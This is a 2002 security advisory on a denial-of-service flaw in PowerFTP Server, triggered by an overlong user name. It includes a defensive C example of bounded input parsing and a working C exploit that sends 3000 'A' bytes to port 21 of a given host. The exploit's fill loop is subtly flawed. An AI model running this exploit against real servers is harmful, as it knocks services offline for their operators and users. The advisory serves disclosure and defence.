
Cooolsoft PowerFTP Server is vulnerable to a remote denial-of-service attack


Published: 2002-10-11
Updated: 2002-10-11
Severity:
Threat level: remote denial of service
Error type: boundary check error
Exploitation mode: server mode

BUGTRAQ ID:5899

Affected systems
Cooolsoft PowerFTP 2.0 3
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP1
   - Microsoft Windows NT 4.0 SP2
   - Microsoft Windows NT 4.0 SP3
   - Microsoft Windows NT 4.0 SP4
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a
Cooolsoft PowerFTP 2.10
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 95
   - Microsoft Windows 98
   - Microsoft Windows ME
   - Microsoft Windows NT Workstation 4.0
   - Microsoft Windows NT Workstation 4.0 SP1
   - Microsoft Windows NT Workstation 4.0 SP2
   - Microsoft Windows NT Workstation 4.0 SP3
   - Microsoft Windows NT Workstation 4.0 SP4
   - Microsoft Windows NT Workstation 4.0 SP5
   - Microsoft Windows NT Workstation 4.0 SP6a
   - Microsoft Windows XP Home
Cooolsoft PowerFTP 2.23
Cooolsoft PowerFTP 2.24
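Detailed description
PowerFTP Server is an FTP server program.

PowerFTP Server does not correctly handle overlong user name data. An attacker who submits a user name of 3000 or more bytes can crash the server program.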
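
The boundary check whose absence is described above, written out as a bounded parse of the FTP control line. This is an added example, not code from the advisory or from PowerFTP; `ftp_parse_user`, `MAX_LINE` and `MAX_USER` are assumed names and limits, and the sample inputs are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_LINE 512  /* assumed cap on one control-channel line, CRLF included */
#define MAX_USER 64   /* assumed cap on a user name */

/* 0 = keep reading; the others are RFC 959 reply codes. */
enum { FTP_NEED_MORE = 0, FTP_USER_OK = 331, FTP_BAD_CMD = 500, FTP_BAD_ARG = 501 };

/* Hypothetical helper: validate the bytes received so far as a USER command.
 * rx is NOT NUL-terminated, so every access is bounded by len. */
int ftp_parse_user(const char *rx, size_t len, char *user, size_t user_cap)
{
    static const char verb[] = "USER ";
    const char *eol = memchr(rx, '\n', len);
    size_t line_len, n, i;

    if (eol == NULL)  /* no terminator yet: refuse to buffer without limit */
        return len >= MAX_LINE ? FTP_BAD_CMD : FTP_NEED_MORE;
    line_len = (size_t)(eol - rx);
    if (line_len + 1 > MAX_LINE)
        return FTP_BAD_CMD;
    if (line_len > 0 && rx[line_len - 1] == '\r')
        line_len--;
    if (line_len < 6)
        return FTP_BAD_CMD;
    for (i = 0; i < 5; i++)  /* FTP verbs are case-insensitive */
        if (toupper((unsigned char)rx[i]) != verb[i])
            return FTP_BAD_CMD;
    n = line_len - 5;
    if (n > MAX_USER || n >= user_cap)  /* length check BEFORE any copy */
        return FTP_BAD_ARG;
    for (i = 0; i < n; i++)  /* printable ASCII only, no spaces or controls */
        if (rx[5 + i] < 0x21 || rx[5 + i] > 0x7e)
            return FTP_BAD_ARG;
    memcpy(user, rx + 5, n);
    user[n] = '\0';
    return FTP_USER_OK;
}

int main(void)
{
    char user[MAX_USER + 1], flood[3000];  /* constructed input, size from the advisory */
    memset(flood, 'A', sizeof flood);
    printf("3000 x 'A': %d\n", ftp_parse_user(flood, sizeof flood, user, sizeof user));
    printf("normal    : %d\n", ftp_parse_user("USER anonymous\r\n", 16, user, sizeof user));
    return 0;
}
```

A server using this pattern answers the oversized input with a 500 or 501 reply and drops the line, instead of copying it into a fixed buffer.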

Test code
/* Remote DoS Exploit for PowerFTP server (all version) */
/* Coding by Morgan A. member of secureNT-2000 Greetz : */
/* kdm, Yann, GaLiaRepT, and all i've forgotten ;)      */

#include <stdio.h>
#include <winsock.h>
        #pragma comment(lib, "wsock32.lib")

void main()
        {
        WSADATA WSAData;
                WSAStartup(MAKEWORD(2,0), &WSAData);

                SOCKET sock;
                SOCKADDR_IN sin;
                char *buffer = new char[255];

        char ip[50];
        printf ("Remote DoS Exploit for PowerFTP server\n\n");
        printf ("Remote IP: ");
        scanf ("%s", &ip);

        char DoS[3000];
        int i;
        for(i=0;i<strlen(DoS);i++)
        {
        DoS[i]= 'A';
        }

        sock = socket(AF_INET, SOCK_STREAM, 0);

                sin.sin_addr.s_addr                     = inet_addr(ip);
                sin.sin_family                          = AF_INET;
                sin.sin_port                            = htons(21);

                connect(sock, (SOCKADDR *)&sin, sizeof(sin));
                send(sock, DoS, sizeof(DoS), 0);
                closesocket(sock);
                WSACleanup();
        }

Solution


Related information
Armand Morgan <morgan53@evhr.net>.
Reference: http://online.securityfocus.com/archive/1/294157
Related home page: http://www.cooolsoft.com/powerftp.htm